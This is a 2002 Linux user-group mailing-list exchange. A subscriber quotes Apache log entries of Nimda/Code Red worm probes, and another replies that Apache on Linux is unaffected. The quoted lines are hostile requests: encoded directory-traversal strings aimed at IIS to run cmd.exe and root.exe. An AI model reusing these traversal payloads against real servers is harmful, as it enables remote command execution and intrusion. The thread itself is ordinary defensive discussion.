"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276

Tyler Hall plug-discuss@lists.plug.mybutt.net
Mon, 21 Jan 2002 12:06:07 -0700 (MST) 

Where have you been? You should have been getting those the last 6 months!
It's part of the Nimba/Code Red/etc... virus, if your running
apache/linux, there's no need to worry.

Tyler


On Mon, 21 Jan 2002, Guy Chouinard Jr wrote:

> I just noticed this on my Apache server log.
>
> Is this anything I should be concerned about ?
>
> If I understand correctly what I've read is this is
> a worm that exploits MS IIS vulnerabilities.
>
>
> 209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 276
>
> 209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
>
> 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
>
> 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
>
> 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
>
> 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
>
> 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
>
> 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 331
>
> 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
>
> 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
>
> 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
>
> 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
>
> 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
>
> 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
>
> 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
>
> 209.74.14.140 - - [21/Jan/2002:09:39:02 -0700] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
>
>
>
>
> --
> Guy Chouinard Jr
> http://linuxbytes.net.dhis.org/index.php3
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
>
> PLUG-discuss mailing list  -  PLUG-discuss@lists.plug.mybutt.net
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>